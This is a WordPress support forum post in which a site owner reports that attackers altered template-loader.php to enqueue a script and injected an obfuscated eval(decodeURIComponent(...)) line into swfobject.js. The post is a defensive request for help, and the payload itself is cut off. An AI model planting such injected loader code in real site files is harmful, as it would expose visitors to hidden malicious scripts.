• Resolved roadster59

    (@roadster59)


    Hi
    it seems there are somme attack since 2 or 3days on the last wordpress

    they change 2 files
    tamplate-loader.php
    at the begin insert this

    [ Moderator note: code fixed. Please wrap code in the backtick character or use the code button. ]

    function FuncQueueObject()
    {
    	wp_enqueue_script('swfobject');
    }
    add_action('wp_enqueue_scripts', 'FuncQueueObject');

    an the other file is swfobject.js

    and they insert

    eval(decodeURIComponent('etc...

    my wordpress is with the last plugin and the last wordpress and every things ok

    somebody nows what happends
    best regards
    eric

Viewing 11 replies - 1 through 11 (of 11 total)
Viewing 11 replies - 1 through 11 (of 11 total)
  • The topic ‘My WordPress 4.0.1 site has been hacked’ is closed to new replies.